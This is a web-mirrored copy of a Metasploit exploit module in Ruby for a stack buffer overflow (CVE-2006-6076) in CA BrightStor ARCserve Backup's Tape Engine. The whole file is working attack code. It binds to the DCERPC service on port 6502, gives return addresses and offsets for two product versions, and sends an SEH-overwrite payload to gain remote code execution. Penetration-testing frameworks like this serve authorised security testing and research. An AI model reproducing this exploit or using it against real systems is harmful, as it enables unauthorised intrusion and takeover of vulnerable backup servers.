Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/brightstor/tape_engine.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::DCERPC

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'CA BrightStor ARCserve Tape Engine Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup

19
          r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow

20
          the buffer and execute arbitrary code.

21
        },

22
        'Author' => [ 'MC', 'aushack' ],

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'CVE', '2006-6076' ],

26
          [ 'OSVDB', '30637' ],

27
          [ 'BID', '21221' ],

28
          [ 'EDB', '3086' ]

29
        ],

30
        'Privileged' => true,

31
        'DefaultOptions' => {

32
          'EXITFUNC' => 'thread',

33
        },

34
        'Payload' => {

35
          'Space' => 500,

36
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",

37
          'StackAdjustment' => -9500,

38
        },

39
        'Platform' => 'win',

40
        'Targets' => [

41
          [ 'BrightStor ARCserve r11.1', { 'Ret' => 0x2380cdc7, 'Offset' => 1158 } ], # p/p/r cheyprod.dll 07/21/2004

42
          [ 'BrightStor ARCserve r11.5', { 'Ret' => 0x2380ceb5, 'Offset' => 1132 } ], # p/p/r cheyprod.dll ??/??/????

43
        ],

44
        'DisclosureDate' => '2006-11-21',

45
        'DefaultTarget' => 1,

46
        'Notes' => {

47
          'Reliability' => UNKNOWN_RELIABILITY,

48
          'Stability' => UNKNOWN_STABILITY,

49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

50
        }

51
      )

52
    )

53


54
    register_options([ Opt::RPORT(6502) ])

55
  end

56


57
  def exploit

58
    connect

59


60
    handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])

61
    print_status("Binding to #{handle} ...")

62


63
    dcerpc_bind(handle)

64
    print_status("Bound to #{handle} ...")

65


66
    request = "\x00\x04\x08\x0c\x02\x00\x00\x00\x00\x00"

67
    request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

68


69
    dcerpc.call(43, request)

70


71
    filler = "\x10\x09\xf9\x77" + rand_text_english(target['Offset'])

72
    seh = generate_seh_payload(target.ret)

73
    sploit = filler + seh

74


75
    print_status("Trying target #{target.name}...")

76


77
    begin

78
      dcerpc_call(38, sploit)

79
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse

80
    end

81


82
    handler

83
    disconnect

84
  end

85
end

86


87